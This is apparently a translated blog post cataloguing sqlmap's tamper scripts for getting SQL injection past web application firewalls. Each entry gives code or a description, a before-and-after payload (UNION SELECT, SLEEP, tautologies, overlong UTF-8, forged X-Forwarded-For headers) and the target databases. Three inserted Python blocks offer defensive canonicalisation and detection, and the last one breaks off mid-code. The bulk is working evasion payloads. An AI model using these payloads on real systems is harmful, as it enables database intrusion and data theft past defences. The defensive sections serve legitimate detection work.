Every security practitioner has heard of sqlmap, and a rookie like me is no exception, but in day-to-day use I only ever stayed at the surface, especially with the tamper scripts for getting past a WAF: I would just throw the whole lot at the target, and if that didn't work, give up. That is no way to carry on, so I wanted to understand what each tamper script does and which database it is effective against, and then, with that understanding, modify and write my own tamper scripts, which supports our daily work far better. For sqlmap usage in general, see 超详细SQLMap使用攻略及技巧分享 (a detailed SQLMap usage guide).

Usage

```bash
sqlmap.py XXXXX --tamper "module name"
```

What each tamper does

Below is a short introduction to each of the tamper scripts that ship with sqlmap.

1. apostrophemask.py

```python
def tamper(payload, **kwargs):
    return payload.replace('\'', "%EF%BC%87") if payload else payload
```

Replaces the single quote with its URL-encoded full-width UTF-8 form (%EF%BC%87), for cases where the single quote is filtered.

```text
1' AND '1'='1 to 1%EF%BC%87 AND %EF%BC%871%EF%BC%87=%EF%BC%871
```

Applicable DBMS: ALL

2. apostrophenullencode.py

```python
def tamper(payload, **kwargs):
    return payload.replace('\'', "%00%27") if payload else payload
```

Replaces the single quote with %00%27 (a NUL byte followed by the URL-encoded quote), for cases where the single quote is filtered.

```text
1 AND '1'='1 to 1 AND %00%271%00%27=%00%271
```

Applicable DBMS: ALL

3. appendnullbyte.py

```python
def tamper(payload, **kwargs):
    return "%s%%00" % payload if payload else payload
```

Appends %00 (a NUL byte) to the end of the payload.

```text
'1 AND 1=1' to '1 AND 1=1%00'
```

Applicable DBMS: Access

4. base64encode.py

```python
from lib.core.convert import encodeBase64  # sqlmap's own helper


def tamper(payload, **kwargs):
    return encodeBase64(payload, binary=False) if payload else payload
```

Base64-encodes the whole payload.

```text
1' AND SLEEP(5)# to MScgQU5EIFNMRUVQKDUpIw==
```

Applicable DBMS: ALL

5. between.py

```python
import re


def tamper(payload, **kwargs):
    retVal = payload

    if payload:
        # the last "AND/OR x > y" comparison at the end of the payload
        match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload)

        if match:
            _ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5))
            retVal = retVal.replace(match.group(0), _)
        else:
            retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload)

        if retVal == payload:
            # nothing with ">" was rewritten, so rewrite the last "AND/OR x = y" instead
            match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*([\w()]+)\s*", payload)

            if match:
                _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5))
                retVal = retVal.replace(match.group(0), _)

    return retVal
```

Replaces the greater-than sign and the equals sign with BETWEEN expressions, for cases where > and = are filtered.

```text
1 AND A > B-- to 1 AND A NOT BETWEEN 0 AND B--
1 AND A = B-- to 1 AND A BETWEEN B AND B--
1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID() to 1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()
```

Applicable DBMS: ALL

6. bluecoat.py

```python
import re

from lib.core.data import kb  # sqlmap's shared state; kb.keywords is its set of SQL keywords


def tamper(payload, **kwargs):
    def process(match):
        word = match.group('word')
        if word.upper() in kb.keywords:
            return match.group().replace(word, "%s%%09" % word)
        else:
            return match.group()

    retVal = payload

    if payload:
        retVal = re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]|\Z)", process, retVal)
        retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
        retVal = retVal.replace("%09 ", "%09")

    return retVal
```

Replaces the space after each SQL keyword with a valid random blank character (a tab, %09, in the code above) and replaces the equals sign with LIKE, for cases where spaces and = are filtered.

```text
SELECT id FROM users WHERE id = 1 to SELECT%09id FROM%09users WHERE%09id LIKE 1
```

Applicable DBMS: MySQL 5.1, SGOS

7. chardoubleencode.py

Double URL-encodes every character of the payload.

```text
SELECT FIELD FROM%20TABLE to %2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545
```

Applicable DBMS: ALL

8. charencode.py

URL-encodes every character of the payload once.

```text
SELECT FIELD FROM%20TABLE to %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45
```

Applicable DBMS: ALL

9. charunicodeencode.py

Unicode-URL-encodes (%uXXXX) the payload; only characters that are not already encoded are touched.

```text
SELECT FIELD%20FROM TABLE to %u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045
```

Applicable DBMS: ALL, but requires an ASP or ASP.NET backend

10. charunicodeescape.py

Unicode-escapes (\uXXXX) every character of the payload that is not already encoded.

```text
SELECT FIELD FROM TABLE to \u0053\u0045\u004C\u0045\u0043\u0054\u0020\u0046\u0049\u0045\u004C\u0044\u0020\u0046\u0052\u004F\u004D\u0020\u0054\u0041\u0042\u004C\u0045
```

Applicable DBMS: …

11. commalesslimit.py

Rewrites the comma in LIMIT as OFFSET, for the two-argument form when the comma is filtered.

```text
LIMIT 2, 3 to LIMIT 3 OFFSET 2
```

Applicable DBMS: MySQL

12. commalessmid.py

Rewrites the commas in MID as FROM … FOR, for the three-argument form when the comma is filtered.

```text
MID(VERSION(), 1, 1) to MID(VERSION() FROM 1 FOR 1)
```

Applicable DBMS: MySQL

13. commentbeforeparentheses.py

```python
import re


def tamper(payload, **kwargs):
    return re.sub(r"\b(\w+)\(", r"\g<1>/**/(", payload) if payload else payload
```

Adds an inline comment /**/ before the opening parenthesis that follows a function name.

```text
SELECT ABS(1) to SELECT ABS/**/(1)
```

Applicable DBMS: ALL

14. concat2concatws.py

```python
def tamper(payload, **kwargs):
    return payload.replace("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),") if payload else payload
```

Replaces CONCAT( with CONCAT_WS(MID(CHAR(0),0,0), for cases where the concat function is filtered.

```text
CONCAT(1,2) to CONCAT_WS(MID(CHAR(0),0,0),1,2)
```

Applicable DBMS: MySQL

15. equaltolike.py

```python
import re


def tamper(payload, **kwargs):
    return re.sub(r"\s*=\s*", " LIKE ", payload) if payload else payload
```

Replaces the equals sign with LIKE, for cases where = is filtered.

```text
SELECT * FROM users WHERE id=1 to SELECT * FROM users WHERE id LIKE 1
```

Applicable DBMS: ALL

16. escapequotes.py

```python
def tamper(payload, **kwargs):
    return payload.replace("'", "\\'").replace('"', '\\"')
```

Backslash-escapes quotes (the code escapes both ' and "), for cases where the double quote is filtered.

```text
1" AND SLEEP(5)# to 1\" AND SLEEP(5)#
```

Applicable DBMS: ALL

17. greatest.py

Replaces the greater-than sign with GREATEST, for cases where > is filtered.

```text
1 AND A > B to 1 AND GREATEST(A,B+1)=A
```

Applicable DBMS: ALL

18. halfversionedmorekeywords.py

Adds a (half, i.e. unclosed) versioned MySQL comment before every keyword, for cases where keywords are filtered.

```text
value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa to value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa
```

Applicable DBMS: MySQL < 5.1

19. hex2char.py

Replaces every (MySQL) 0x-encoded hex string with an equivalent CONCAT(CHAR(),…) expression.

```text
SELECT 0xdeadbeef to SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))
```

Applicable DBMS: MySQL 4, 5.0 and 5.5

20. htmlencode.py

```python
import re


def tamper(payload, **kwargs):
    return re.sub(r"[^\w]", lambda match: "&#%d;" % ord(match.group(0)), payload) if payload else payload
```

HTML-encodes every non-alphanumeric character of the payload (as a numeric entity).

```text
1' AND SLEEP(5)# to 1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;
```

Applicable DBMS: …

21. ifnull2casewhenisnull.py

Rewrites IFNULL as a CASE WHEN ISNULL expression, to get past web application firewalls that filter the ifnull() function.

```text
IFNULL(1, 2) to CASE WHEN ISNULL(1) THEN (2) ELSE (1) END
```

Applicable DBMS: MySQL 5.0 and 5.5

22. ifnull2ifisnull.py

Rewrites IFNULL as IF(ISNULL(A), …).

```text
IFNULL(1, 2) to IF(ISNULL(1),2,1)
```

Applicable DBMS: MySQL 5.0 and 5.5

23. informationschemacomment.py

```python
import re


def tamper(payload, **kwargs):
    return re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload) if payload else payload
```

Adds an inline comment after the information_schema identifier, to get past filters that match on information_schema.

```text
SELECT table_name FROM INFORMATION_SCHEMA.TABLES to SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES
```

Applicable DBMS: ALL

24. least.py

Replaces the greater-than sign with LEAST, for cases where > is filtered.

```text
1 AND A > B to 1 AND LEAST(A,B+1)=B+1
```

Applicable DBMS: MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0

25. lowercase.py

Converts every upper-case character of the payload to lower case.

```text
INSERT to insert
```

Applicable DBMS: ALL

26. luanginx.py

Used to bypass the Lua nginx WAF, which cannot handle more than 100 parameters.

1 AND 2>1 to 34=&Xe=&90=&Ni=&rW=&lc=&te=&T4=&zO=&NY=&B4=&hM=&X2=&pU=&D8=&hm=&p0=&7y=&18=&RK=&Xi=&5M=&vM=&hO=&bg=&5c=&b8=&dE=&7I=&5I=&90=&R2=&BK=&bY=&p4=&lu=&po=&Vq=&bY=&3c=&ps=&Xu=&lK=&3Q=&7s=&pq=&1E=&rM=&FG=&vG=&Xy=&tQ=&lm=&rO=&pO=&rO=&1M=&vy=&La=&xW=&f8=&du=&94=&vE=&9q=&bE=&lQ=&JS=&NQ=&fE=&RO=&FI=&zm=&5A=&lE=&DK=&x8=&RQ=&Xw=&LY=&5S=&zi=&Js=&la=&3I=&r8=&re=&Xe=&5A=&3w=&vs=&zQ=&1Q=&HW=&Bw=&Xk=&LU=&Lk=&1E=&Nw=&pm=&ns=&zO=&xq=&7k=&v4=&F6=&Pi=&vo=&zY=&vk=&3w=&tU=&nW=&TG=&NM=&9U=&p4=&9A=&T8=&Xu=&xa=&Jk=&nq=&La=&lo=&zW=&xS=&v0=&Z4=&vi=&Pu=&jK=&DE=&72=&fU=&DW=&1g=&RU=&Hi=&li=&R8=&dC=&nI=&9A=&tq=&1w=&7u=&rg=&pa=&7c=&zk=&rO=&xy=&ZA=&1K=&ha=&tE=&RC=&3m=&r2=&Vc=&B6=&9A=&Pk=&Pi=&zy=&lI=&pu=&re=&vS=&zk=&RE=&xS=&Fs=&x8=&Fe=&rk=&Fi=&Tm=&fA=&Zu=&DS=&No=&lm=&lu=&li=&jC=&Do=&Tw=&xo=&zQ=&nO=&ng=&nC=&PS=&fU=&Lc=&Za=&Ta=&1y=&lw=&pA=&ZW=&nw=&pM=&pa=&Rk=&lE=&5c=&T4=&Vs=&7W=&Jm=&xG=&nC=&Js=&xM=&Rg=&zC=&Dq=&VA=&Vy=&9o=&7o=&Fk=&Ta=&Fq=&9y=&vq=&rW=&X4=&1W=&hI=&nA=&hs=&He=&No=&vy=&9C=&ZU=&t6=&1U=&1Q=&Do=&bk=&7G=&nA=&VE=&F0=&BO=&l2=&BO=&7o=&zq=&B4=&fA=&lI=&Xy=&Ji=&lk=&7M=&JG=&Be=&ts=&36=&tW=&fG=&T4=&vM=&hG=&tO=&VO=&9m=&Rm=&LA=&5K=&FY=&HW=&7Q=&t0=&3I=&Du=&Xc=&BS=&N0=&x4=&fq=&jI=&Ze=&TQ=&5i=&T2=&FQ=&VI=&Te=&Hq=&fw=&LI=&Xq=&LC=&B0=&h6=&TY=&HG=&Hw=&dK=&ru=&3k=&JQ=&5g=&9s=&HQ=&vY=&1S=&ta=&bq=&1u=&9i=&DM=&DA=&TG=&vQ=&Nu=&RK=&da=&56=&nm=&vE=&Fg=&jY=&t0=&DG=&9o=&PE=&da=&D4=&VE=&po=&nm=&lW=&X0=&BY=&NK=&pY=&5Q=&jw=&r0=&FM=&lU=&da=&ls=&Lg=&D8=&B8=&FW=&3M=&zy=&ho=&Dc=&HW=&7E=&bM=&Re=&jk=&Xe=&JC=&vs=&Ny=&D4=&fA=&DM=&1o=&9w=&3C=&Rw=&Vc=&Ro=&PK=&rw=&Re=&54=&xK=&VK=&1O=&1U=&vg=&Ls=&xq=&NA=&zU=&di=&BS=&pK=&bW=&Vq=&BC=&l6=&34=&PE=&JG=&TA=&NU=&hi=&T0=&Rs=&fw=&FQ=&NQ=&Dq=&Dm=&1w=&PC=&j2=&r6=&re=&t2=&Ry=&h2=&9m=&nw=&X4=&vI=&rY=&1K=&7m=&7g=&J8=&Pm=&RO=&7A=&fO=&1w=&1g=&7U=&7Y=&hQ=&FC=&vu=&Lw=&5I=&t0=&Na=&vk=&Te=&5S=&ZM=&Xs=&Vg=&tE=&J2=&Ts=&Dm=&Ry=&FC=&7i=&h8=&3y=&zk=&5G=&NC=&Pq=&ds=&zK=&d8=&zU=&1a=&d8=&Js=&nk=&TQ=&tC=&n8=&Hc=&Ru=&H0=&Bo=&XE=&Jm=&xK=&r2=&Fu=&FO=&NO=&7g=&PC=&Bq=&3O=&FQ=&1o=&5G=&zS=&Ps=&j0=&b0=&RM=&DQ=
&RQ=&zY=&nk=&1 AND 2>1

Applies to: Lua nginx WAF

27. modsecurityversioned.py

Wraps the complete query in a versioned MySQL comment, to get past the open-source ModSecurity WAF.

```text
1 AND 2>1-- to 1 /*!30963AND 2>1*/--
```

Applicable DBMS: MySQL 5.0

28. modsecurityzeroversioned.py

Wraps the complete query in a zero-versioned MySQL comment; same idea as the previous script, used to get past a WAF.

```text
1 AND 2>1-- to 1 /*!00000AND 2>1*/--
```

Applicable DBMS: MySQL 5.0

29. multiplespaces.py

Adds multiple spaces around SQL keywords.

```text
1 UNION SELECT foobar to 1     UNION     SELECT     foobar
```

Applicable DBMS: ALL

30. overlongutf8.py

Converts characters of the payload to overlong UTF-8 sequences (in the example the space and the > are converted).

```text
SELECT FIELD FROM TABLE WHERE 2>1 to SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1
```

Applicable DBMS: ALL

31. overlongutf8more.py

Converts every character of the payload to an overlong UTF-8 sequence.

```text
SELECT FIELD FROM TABLE WHERE 2>1 to %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1
```

Applicable DBMS: ALL

32. percentage.py

Adds a % before every character: a percent sign in front of each letter of a keyword gets the keyword past a keyword filter.

```text
SELECT FIELD FROM TABLE to %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
```

Applicable DBMS: ALL, but requires an ASP backend
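Seen from the defending side, the encoding-style tampers above (apostrophemask, apostrophenullencode, appendnullbyte, charencode, chardoubleencode, charunicodeencode, charunicodeescape, htmlencode, overlongutf8, overlongutf8more and percentage) all rely on the inspection point decoding less than the backend does. The Python below is an added example, not sqlmap code and not from the original post: it canonicalises input before any signature is evaluated, peeling %XX, %uXXXX, \uXXXX, HTML-entity and overlong UTF-8 layers until the text stops changing, folding the full-width apostrophe with NFKC, dropping NUL bytes and removing IIS-style stray percent signs. The sample inputs are the before/after strings from this page; base64encode is deliberately out of scope, since its output only means something to the receiving application. Function and pattern names are my own.

```python
import html
import re
import unicodedata
import urllib.parse

# Added example, not sqlmap code. Overlong two-byte UTF-8: lead byte C0/C1 plus a continuation byte.
OVERLONG_2BYTE = re.compile(rb"[\xc0\xc1][\x80-\xbf]")

# Assumed, constructed "looks like SQL" rule evaluated only on the canonical form.
SQL_MARKERS = re.compile(r"(?i)(\bunion\b.*\bselect\b|\bsleep\s*\(|'\s*(and|or)\b)")


def percent_decode(s: str) -> str:
    """%XX-decode to bytes, fold overlong two-byte sequences (%C0%A0 -> ' ', %C1%93 -> 'S')
    to the ASCII they encode, then decode leniently so a lone high byte such as %bf does not abort."""
    raw = urllib.parse.unquote_to_bytes(s)
    raw = OVERLONG_2BYTE.sub(
        lambda m: bytes([((m.group(0)[0] & 0x1F) << 6) | (m.group(0)[1] & 0x3F)]), raw)
    return raw.decode("utf-8", errors="replace")


def decode_layer(s: str) -> str:
    """One pass through every encoding the tampers listed above can apply."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)   # charunicodeencode (%uXXXX)
    s = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)  # charunicodeescape (\uXXXX)
    s = percent_decode(s)                                                       # charencode, overlongutf8*
    s = html.unescape(s)                                                        # htmlencode (&#39; ...)
    return s


def canonicalize(payload: str, max_layers: int = 5) -> str:
    """Peel encoding layers until the text stops changing (chardoubleencode needs two passes),
    then fold full-width look-alikes, strip NUL bytes and drop percent signs that start no escape."""
    s = payload
    for _ in range(max_layers):
        peeled = decode_layer(s)
        if peeled == s:
            break
        s = peeled
    s = unicodedata.normalize("NFKC", s)        # apostrophemask: U+FF07 full-width quote -> "'"
    s = s.replace("\x00", "")                    # apostrophenullencode / appendnullbyte padding
    s = re.sub(r"%(?![0-9a-fA-F]{2})", "", s)    # percentage: ASP silently drops such a '%'
    return s


def looks_like_sqli(payload: str) -> bool:
    """Evaluate the marker rule on the canonical form rather than on the wire bytes."""
    return SQL_MARKERS.search(canonicalize(payload)) is not None


if __name__ == "__main__":
    # constructed sample: the htmlencode output from this page
    sample = "1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;"
    print(repr(canonicalize(sample)), looks_like_sqli(sample))
```

The loop has a fixed depth on purpose: a decoder that recurses without a bound is itself a denial-of-service target, and anything that still contains escapes after five rounds is worth logging as an anomaly in its own right.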

33. plus2concat.py

Replaces the plus sign with the CONCAT function, for cases where + is filtered.

```text
SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL
to
SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL
```

Applicable DBMS: Microsoft SQL Server 2012+

34. plus2fnconcat.py

Replaces the plus sign with the ODBC function {fn CONCAT()}, for cases where + is filtered.

```text
SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL
to
SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL
```

Applicable DBMS: Microsoft SQL Server 2008+

35. randomcase.py

Randomises the case of each letter in the payload, for cases where a case-sensitive filter can be bypassed this way.

```text
SELECT id FROM `user` to SeLeCt id FrOm `user`
```

Applicable DBMS: ALL

36. randomcomments.py

Inserts /**/ at random positions inside the keywords of the payload, to get past keyword filters.

```text
INSERT to I/**/NS/**/ERT
```

Applicable DBMS: ALL, but requires an ASP backend

37. sp_password.py

Appends the string sp_password to the end of the payload, to obscure the statement in the database logs.

```text
1 AND 9227=9227--  to 1 AND 9227=9227-- sp_password
```

Applicable DBMS: MSSQL

38. space2comment.py

Replaces spaces with /**/.

```text
SELECT id FROM users to SELECT/**/id/**/FROM/**/users
```

Applicable DBMS: ALL

39. space2dash.py

Replaces each space character (' ') with a dash comment ('--') followed by a random string and a newline ('\n').

```text
1 AND 9227=9227 to 1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227
```

Applicable DBMS: MSSQL, SQLite

40. space2hash.py

Replaces each space with a '#' followed by a random string and a newline.

```text
1 AND 9227=9227 to 1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227
```

Applicable DBMS: MySQL 4.0, 5.0

41. space2morecomment.py

Replaces spaces with /**_**/.

```text
SELECT id FROM users to SELECT/**_**/id/**_**/FROM/**_**/users
```

Applicable DBMS: MySQL 5.0 and 5.5

42. space2morehash.py

Replaces spaces with '#' plus random characters and a newline; similar to space2hash.py, but with an extra '#' and newline inserted, as below:

```text
1 AND 9227=9227 to 1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227

1 AND 9227=9227 to 1%23RcDKhIr%0AAND%23upgPydUzKpMX%0A%23lgbaxYjWJ%0A9227=9227
```

Applicable DBMS: MySQL >= 5.1.13

43. space2mssqlblank.py

```python
# the alternative blank characters the script picks from at random
blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')
```

Replaces each space in the payload with a random blank character drawn from the set of valid alternatives above.

```text
SELECT id FROM users to SELECT%0Did%0DFROM%04users
```

Applicable DBMS: SQL Server

44. space2mssqlhash.py

Replaces each space in the payload with '#' followed by a newline.

```text
1 AND 9227=9227 to 1%23%0AAND%23%0A9227=9227
```

Applicable DBMS: MSSQL, MySQL

45. space2mysqlblank.py

```python
# the alternative blank characters the script picks from at random
blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0')
```

Replaces each space with a random blank character drawn from the set of valid alternatives above.

```text
SELECT id FROM users to SELECT%A0id%0CFROM%0Dusers
```

Applicable DBMS: MySQL

46. space2mysqldash.py

Replaces each space with a dash comment ('--') followed by a newline.

```text
1 AND 9227=9227 to 1--%0AAND--%0A9227=9227
```

Applicable DBMS: MySQL, MSSQL

47. space2plus.py

Replaces each space with a plus sign ('+').

```text
SELECT id FROM users to SELECT+id+FROM+users
```

Applicable DBMS: ALL

48. space2randomblank.py

```python
# the alternative blank characters the script picks from at random
blanks = ("%09", "%0A", "%0C", "%0D")
```

Replaces each space with a random blank character drawn from the set of valid alternatives above.

```text
SELECT id FROM users to SELECT%0Did%0CFROM%0Ausers
```

Applicable DBMS: ALL

49. substring2leftright.py

Replaces the PostgreSQL SUBSTRING function with LEFT and RIGHT.

```text
SUBSTRING((SELECT usename FROM pg_user)::text FROM 1 FOR 1) to LEFT((SELECT usename FROM pg_user)::text,1)
SUBSTRING((SELECT usename FROM pg_user)::text FROM 3 FOR 1) to LEFT(RIGHT((SELECT usename FROM pg_user)::text,-2),1)
```

Applicable DBMS: PostgreSQL

50. symboliclogical.py

```python
import re


def tamper(payload, **kwargs):
    return re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload)) if payload else payload
```

Replaces AND with && and OR with || (URL-encoded), for cases where these keywords are filtered.

```text
1 AND '1'='1 to 1 %26%26 '1'='1
1 or 1=1 to 1 %7c%7c 1=1
```

Applicable DBMS: ALL

51. unionalltounion.py

```python
def tamper(payload, **kwargs):
    return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload
```

Replaces UNION ALL SELECT with UNION SELECT.

```text
-1 UNION ALL SELECT to -1 UNION SELECT
```

Applicable DBMS: ALL

52. unmagicquotes.py

Wide-character bypass of GPC (magic quotes): the quote is replaced with the multibyte combination %bf%27 and a generic comment is appended at the end.

```text
1' AND 1=1 to 1%bf%27-- -
```

Applicable DBMS: ALL

53. uppercase.py

Converts the whole payload to upper case.

```text
insert to INSERT
```

Applicable DBMS: ALL

54. varnish.py

Adds an HTTP header "X-originating-IP" to bypass the WAF; the header can also be customised, for example:

```text
X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)
X-remote-IP: TARGET_PROXY_IP (184.189.250.X)
X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)
x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)
X-remote-IP: * or %00 or %0A
```

Applicable DBMS: ALL

55. versionedkeywords.py

Wraps every non-function keyword in a versioned MySQL comment.

```text
1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#

to

1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
```

Applicable DBMS: MySQL

56. versionedmorekeywords.py

Wraps every keyword in a versioned MySQL comment, using comments to get past the filter.

```text
1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#

to

1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
```
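The second family of tampers above (between, bluecoat, equaltolike, halfversionedmorekeywords, modsecurityversioned, modsecurityzeroversioned, multiplespaces, randomcomments, the space2* scripts, symboliclogical, versionedkeywords and versionedmorekeywords) leaves the characters alone and instead hides the token structure behind comments, alternative blanks and operator rewrites. The Python below is an added example, not sqlmap code and not from the original post: it rebuilds a canonical form of a fragment before a signature is applied, and its sample inputs are the before/after strings from this page. One edge case is handled explicitly: an empty comment must be read as a blank for space2comment (SELECT/**/id) but as nothing at all for randomcomments (I/**/NS/**/ERT), so detect() evaluates both readings. Function and signature names are my own.

```python
import re
import urllib.parse
from typing import List

# Added example; not sqlmap code. Reverses the comment/whitespace/operator rewrites
# described above so one plain signature can be checked against a canonical form.


def normalize(payload: str, join_empty_comments: bool = False) -> str:
    """Canonical, whitespace-collapsed form of a possibly tampered SQL fragment.

    join_empty_comments=True deletes '/**/' outright (the reading 'I/**/NS/**/ERT' needs);
    the default treats it as a blank (the reading 'SELECT/**/id' needs)."""
    # %23 -> '#', %0A -> '\n', %26%26 -> '&&', %A0 -> NBSP (latin-1 so a lone high byte survives)
    s = urllib.parse.unquote(payload, encoding="latin-1")
    # closed versioned comments, /*!30963AND 2>1*/ and /*!UNION*/, keep their inner text
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)
    # unclosed versioned openers left by halfversionedmorekeywords: /*!0UNION
    s = re.sub(r"/\*!\d*", " ", s)
    if join_empty_comments:
        s = s.replace("/**/", "")
    # every other C-style comment (/**/, /**_**/, random filler) reads as a blank
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    # '#junk\n' and '--junk\n' from space2hash / space2dash / space2mysqldash end at the newline
    s = re.sub(r"(#|--)[^\n]*\n", " ", s)
    # symboliclogical
    s = s.replace("&&", " AND ").replace("||", " OR ")
    # tab/newline/VT/FF, the MSSQL control chars %01-%0F, NBSP and '+' all stand in for a space
    s = re.sub(r"[\s\x01-\x1f\xa0+]+", " ", s)
    # equaltolike / bluecoat, then the two rewrites performed by between.py
    s = re.sub(r"(?i)\s+LIKE\s+", " = ", s)
    s = re.sub(r"(?i)\bNOT BETWEEN 0 AND\b", ">", s)
    s = re.sub(r"(?i)\bBETWEEN (\S+) AND \1(?![\w(])", r"= \1", s)
    # no blanks around comparison operators, then collapse whatever is left (multiplespaces)
    s = re.sub(r"\s*([=<>])\s*", r"\1", s)
    return re.sub(r"\s+", " ", s).strip()


# Constructed signatures, written against the canonical form only; (?i) covers randomcase.
SIGNATURES = {
    "union_select": re.compile(r"(?i)\bunion(\s+all)?\s+select\b"),
    "tautology": re.compile(r"(?i)\b(and|or)\s+'?(\w+)'?='?\2'?(?![\w(])"),
    "time_delay": re.compile(r"(?i)\b(sleep|benchmark|waitfor)\b"),
}


def detect(payload: str) -> List[str]:
    """Names of the signatures that fire on either canonical reading of the payload."""
    hits = set()
    for form in (normalize(payload), normalize(payload, join_empty_comments=True)):
        for name, rx in SIGNATURES.items():
            if rx.search(form):
                hits.add(name)
    return sorted(hits)


if __name__ == "__main__":
    # constructed samples: the space2hash and randomcomments outputs from this page
    for sample in ("1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227", "I/**/NS/**/ERT"):
        print(repr(sample), "->", repr(normalize(sample)), detect(sample))
```

The '+'-to-space step assumes the fragment came from a query string; applied to a body or header it will also split expressions such as B+1, which is harmless for a detector but worth knowing when reading the canonical form in a log.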
57. xforwardedfor.py

```python
from lib.core.common import randomIP  # sqlmap's own helper


def tamper(payload, **kwargs):
    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = randomIP()
    headers["X-Client-Ip"] = randomIP()
    headers["X-Real-Ip"] = randomIP()
    return payload
```

Adds a forged HTTP header "X-Forwarded-For" (plus X-Client-Ip and X-Real-Ip) to bypass the WAF.

Applicable DBMS: ALL
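The last two scripts (varnish and xforwardedfor) only work where something in the request path trusts client-supplied address headers, which is the point to fix on the application side. The Python below is an added example, not sqlmap code and not from the original post: it resolves the real client address by walking X-Forwarded-For from the right and discarding every hop that is not appended by a trusted proxy, ignores all override headers when the TCP peer is not a trusted proxy, and reports the anomalies a log should record. The trusted proxy range (10.0.0.0/8), the sample addresses and the function names are constructed assumptions.

```python
import ipaddress
from typing import Dict, List, Tuple

# Added example, not sqlmap code. Assumed, constructed deployment: reverse proxies that may
# legitimately append to X-Forwarded-For live in 10.0.0.0/8.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

# Headers the tampers above inject; none of them is meaningful from an untrusted peer.
OVERRIDE_HEADERS = ("x-forwarded-for", "x-client-ip", "x-real-ip",
                    "x-originating-ip", "x-remote-ip", "x-remote-addr")


def _trusted(addr) -> bool:
    return any(addr in net for net in TRUSTED_PROXIES)


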